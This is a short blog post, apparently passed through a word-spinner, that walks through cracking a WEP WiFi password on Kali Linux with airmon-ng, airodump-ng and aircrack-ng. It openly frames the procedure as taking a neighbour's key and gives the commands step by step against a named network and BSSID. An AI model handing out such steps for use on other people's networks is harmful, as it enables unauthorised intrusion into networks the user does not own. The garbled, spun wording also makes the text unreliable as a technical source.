Hack Wifi? Cracking WEP Key on Kali Linux Using Aircrack-ng!

 Do you know that it is so natural to break WEP passwords with Kali Linux? The entire procedure takes around 10 to 15 minutes and more often than not never falls flat. WEP security is obsolete and powerless. Kali Linux running Aircrack-ng makes short work of it. A couple charges here and a couple orders there and you have the WEP secret key of your neighbor in your grasp. Verify you put the WEP secret key to great utilize obviously.

Thus, how about we start hacking your neighbor's WiFi's WEP secret key!

> Cracking WEP passwords using Kali Linux
    1.Open up a Terminal window.
    2.Enter: airmon-ng
    3.Note down the interface on which you want to start the monitoring.
    4.Enter: airmon-ng start wlan0 If the result looks like this: then your card is in monitor mod.

    5.Note down the monitoring interface’s name (“monitor mode enabled on mon0“). In my case it is mon0 so I will be using mon0.

      6.Enter: airodump-ng mon0
7.My target is “mtnl” which is using WEP encryption and authentication. Wifi “mtnl” is working on channel 4 and BSSID (or bssid) is 0C:D2:B5:03:43:68. I will be using this information. Enter: airodump-ng –w mtnl-org –c 4 –bssid 0C:D2:B5:03:43:68 mon0
8.After about 15,000 packets have been captured, enter: aircrack-ng mtnl-org-01.cap to start cracking the WEP password.

No comments

Powered by Blogger.